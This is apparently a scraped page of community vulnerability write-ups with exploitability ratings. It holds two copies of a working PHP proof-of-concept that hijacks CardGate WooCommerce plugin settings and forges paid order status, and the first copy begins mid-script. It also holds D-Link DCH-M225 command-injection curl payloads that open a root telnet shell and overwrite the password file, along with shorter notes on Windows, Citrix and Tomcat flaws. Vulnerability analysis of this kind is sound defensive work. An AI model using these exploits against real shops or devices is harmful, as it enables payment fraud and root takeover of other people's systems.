define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
// --------- Options (end) ---------

define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sToken_ 
 * @param bool $bTestmode_ 
 * @return string
 */
function pullConfig($sToken_, $bTestmode_ = FALSE) {
	if (!is_string($sToken_)) {
		throw new Exception('invalid token for settings pull: ' . $sToken_);
	}

	$sResource = "pullconfig/{$sToken_}/";
	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_URL, $sUrl);
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
		'Content-Type: application/json',
		'Accept: application/json'
	]);
	if ($bTestmode_) {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
	} else {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
	}

	if (FALSE == ($sResults = curl_exec($rCh))) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}
	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
		throw new Exception('remote gave invalid JSON: ' . $sResults);
	}
	if (isset($aResults['error'])) {
		throw new Exception($aResults['error']['message']);
	}

	return $aResults;
}

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sUrl 
 * @param array $aData_ 
 * @param string $sHttpMethod_ 
 * @return string
 */
function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
		throw new Exception('invalid http method: ' . $sHttpMethod_);
	}

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);

	if ('POST' == $sHttpMethod_) {
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
		curl_setopt($rCh, CURLOPT_POST, TRUE);
		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
	} else {
		$sUrl = $sUrl
			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
			. http_build_query($aData_)
		;
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
	}

	$response = curl_exec($rCh);
	if (FALSE == $response) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}

	return $response;
}

if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
	try {
		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
		$aConfigData = $aResult['pullconfig']['content'];
		$response = doRequest(TARGET . '/cardgate/payment/callback', $_REQUEST, 'GET');
		if ($response == $aConfigData['merchant_id'] . '.' . $aConfigData['site_id'] . '.200') {
			if (ORDER) {
				$payload = [
					'testmode' => $_REQUEST['testmode'],
					'reference' => ORDER,
					'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
					'currency' => ORDER_CURRENCY,
					'amount' => ORDER_AMOUNT * 100,
					'status' => 'success',
					'code' => 200,
					'pt' => ORDER_PAYMENT_TYPE
				];
				$payload['hash'] = md5(
					(!empty($payload['testmode']) ? 'TEST' : '')
					. $payload['transaction']
					. $payload['currency']
					. $payload['amount']
					. $payload['reference']
					. $payload['code']
					. $aConfigData['site_key']
				);
				$response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET');
				if ($response == $payload['transaction'] . '.' . $payload['code']) {
					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
				} else {
					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
				}
			} else {
				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
			}
		} else {
			throw new Exception("It seems target is not vulnerable ($response)");
		}
	} catch (\Exception $oException_) {
		die(htmlspecialchars($oException_->getMessage()));
	}
}

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

This is for a specific plugin for WooCommerce, not WooCommerce itself. This plugin has a relatively small number of installs so it is not likely to see large scale use.

There is a public POC attached to the GitHub repo and duplicated at the end of this analysis for convenience. Authenticated access is not required. https://github.com/cardgate/woocommerce/issues/18

/*
  Usage:

  1. Change values of the constants (see below for TARGET & ORDER*)
  2. Host this script somewhere (must be public accessible)
  3. Register a merchant at https://cardgate.com
  4. Sign into "My CardGate" dashboard
  5. Add fake site or choose existing one
  6. Click "Setup your Webshop" button in site preferences
  7. Paste the URL of this script into the pop-up window and click "Save"
  8. The target store now uses the settings of your site, enjoy :]

  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/

// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', 0); // provide non-zero value to automagically spoof order status
// --------- Options (end) ---------

define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sToken_ 
 * @param bool $bTestmode_ 
 * @return string
 */
function pullConfig($sToken_, $bTestmode_ = FALSE) {
	if (!is_string($sToken_)) {
		throw new Exception('invalid token for settings pull: ' . $sToken_);
	}

	$sResource = "pullconfig/{$sToken_}/";
	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_URL, $sUrl);
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
		'Content-Type: application/json',
		'Accept: application/json'
	]);
	if ($bTestmode_) {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
	} else {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
	}

	if (FALSE == ($sResults = curl_exec($rCh))) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}
	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
		throw new Exception('remote gave invalid JSON: ' . $sResults);
	}
	if (isset($aResults['error'])) {
		throw new Exception($aResults['error']['message']);
	}

	return $aResults;
}

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sUrl 
 * @param array $aData_ 
 * @param string $sHttpMethod_ 
 * @return string
 */
function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
		throw new Exception('invalid http method: ' . $sHttpMethod_);
	}

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);

	if ('POST' == $sHttpMethod_) {
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
		curl_setopt($rCh, CURLOPT_POST, TRUE);
		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
	} else {
		$sUrl = $sUrl
			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
			. http_build_query($aData_)
		;
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
	}

	$response = curl_exec($rCh);
	if (FALSE == $response) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}

	return $response;
}

if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
	try {
		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
		$aConfigData = $aResult['pullconfig']['content'];
		$response = doRequest(TARGET, $_REQUEST);
		if ($response == $aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200') {
			if (ORDER) {
				$payload = [
					'testmode' => $_REQUEST['testmode'],
					'reference' => random_int(10000000000, 99999999999) . ORDER,
					'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
					'currency' => '',
					'amount' => 0,
					'status' => 'success',
					'code' => 200
				];
				$payload['hash'] = md5(
					(!empty($payload['testmode']) ? 'TEST' : '')
					. $payload['transaction']
					. $payload['currency']
					. $payload['amount']
					. $payload['reference']
					. $payload['code']
					. $aConfigData['site_key']
				);
				$response = doRequest(TARGET . '/?cgp_notify=true', $payload);
				if ($response == $payload['transaction'] . '.' . $payload['code']) {
					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
				} else {
					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
				}
			} else {
				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
			}
		} else {
			throw new Exception("It seems target is not vulnerable ($response)");
		}
	} catch (\Exception $oException_) {
		die(htmlspecialchars($oException_->getMessage()));
	}
}
2
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Low
Technical Analysis

This analysis is a transcript of a public gist – Original Source – https://gist.github.com/jezzaaa/9d704400a7e23f988dfb4f73658678b8

D-Link DCH-M225 1.04 devices allow authenticated admins to
execute arbitrary OS commands via shell metacharacters in the media
renderer name.


[Additional Information]
The vendor has stated that the device has been discontinued (as of
April 2018), and that they won’t be patching.

I have requested the vendor confirm the exploit. They have not
responded to this question.


[VulnerabilityType Other]
command injection (missing input validation, escaping)


[Vendor of Product]
D-Link


[Affected Product Code Base]
DCH-M225 Wi-fi Range Extender – 1.04


[Attack Type]
Local


[Attack Vectors]
Login to the admin console (as admin), then set the “media renderer”
name to a string containing a single-quoted arbitrary command
prepended by a semicolon such as telnetd. The command runs as root.


[Reference]
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10152
https://www.dlink.com.au/home-solutions/dch-m225-wi-fi-audio-extender
https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf
https://www.dlink.com/en/security-bulletin

4
Ratings
Technical Analysis

This analysis is a transcript of a public gist – Original Source – https://gist.github.com/jezzaaa/38c752d0a129576b2cc523ce6325050f

D-Link DCH-M225 1.04 devices allow remote attackers to execute
arbitrary OS commands via shell metacharacters in the
spotifyConnect.php userName parameter.


[Additional Information]
From the local network (eg wifi), access the URL
http://ip-address/spotifyConnect.php with POST variables:

action=addUser userName=;/usr/sbin/telnetd -i br0 >/dev/null &;

For example, from a Linux command-line:

curl -d ‘action=addUser&userName=;/usr/sbin/telnetd -i br0 >/dev/null &;’ http://192.168.0.50/spotifyConnect.php

This starts a telnet daemon that provides a root shell with no
password.Then telnet to the device for a root shell.

The same exploit can be used to temporarily change the root password,
using something like:

curl -d ‘action=addUser&userName=;echo “\“Admin\” \“\” \“0\”“>/var/passwd.new;’ http://192.168.1.204/spotifyConnect.php

This exploit would also work on a network that exposes port 80 on the
device to the Internet, in which case this would allow a remote root
shell to an unprivileged user.

The vendor has stated that the device has been discontinued (as of
April 2018), and that they won’t be patching.

The vulnerable “Spotify Connect” feature of the product may have been
implemented on other devices that are still for sale or still under
support, possibly using the same vulnerable code implemented in
spotifyCode.php on this device. The vendor has been asked if any
of their other products use the same code, but they did not answer
this question.


[VulnerabilityType Other]
command injection (missing input validation, escaping)


[Vendor of Product]
D-Link


[Affected Product Code Base]
DCH-M225 Wi-fi Range Extender – 1.04


[Affected Component]
script spotifyConnect.php


[Attack Type]
Local


[Attack Vectors]
Submit HTTP request to add a Spotify Connect user (no admin auth
required), using a username containing a semicolon followed by an
arbitrary command (which runs as root) such as telnetd or commands to
modify the admin user’s password.


[References]
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10152
https://www.dlink.com.au/home-solutions/dch-m225-wi-fi-audio-extender
https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf
https://www.dlink.com/en/security-bulletin

6
Ratings
Technical Analysis

Like some others have said, this requires an understanding of your targets Host devices in order to generate a reliable exploit. This involves identifying the Start address of the NonPageedPool and plugging this into the existing metasploit module.

With a large number of cloud-based resources this is perhaps a little easier to exploit than enterprise desktops.

An example against AWS hosted windows appliances works something like this.

  • Spin up your own AWS Instance.
  • Use Memory Dump tool like WinPMem to grab a memory image.
  • Transfer mem dump to a machine running the rekall memory forensics tool
  • Run the pools plugin to get the address.

This offset will work against any instance in this region started from that same base AMI.

alt text

3
Ratings
Technical Analysis

This appliance is targetted towards small to medium enterprise which means it more valuable to an attacker than attacks against home user equipment.

If compromised access to this device could be used to perform network-level compromise via DNS attacks or reveal sensitive information about the network.

It requires local network access in order to exploit the vulnerability. This device lists “Guest access control” as one of its features so depending on its configuration Local access my be available.

Devices like APs and embedded devices are often overlooked when applying security updates and patches.

At the time of analysis, there is no firmware update available to remediate the vulnerability although POC code does not yet appear to be publicly available.

Despite the absence of available POC code it is trivial to download the firmware and extract the files system. A determined attacker could then identify the exploit manually.

6
Ratings
Technical Analysis

AWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.

At the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.

If you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs

4
Ratings
Technical Analysis

Current PoC’s offer unauthenticated LFI inside the webroot.
Depending on the application and organisations configuration this could reveal sensitive information from database config or other configurations within the source code.

There is the potential for RFI / RCE although example of this are not yet public.

With a shift towards containers like Kubernetes / Docker it is important to note that older tags which may be version pinned by organisations are unlikely to be patched.

The official containers distributed by Apache include tags for vulnerable version although they do not appear to server port 8009 by default. A custom server.xml is required. This is “Likely” to happen.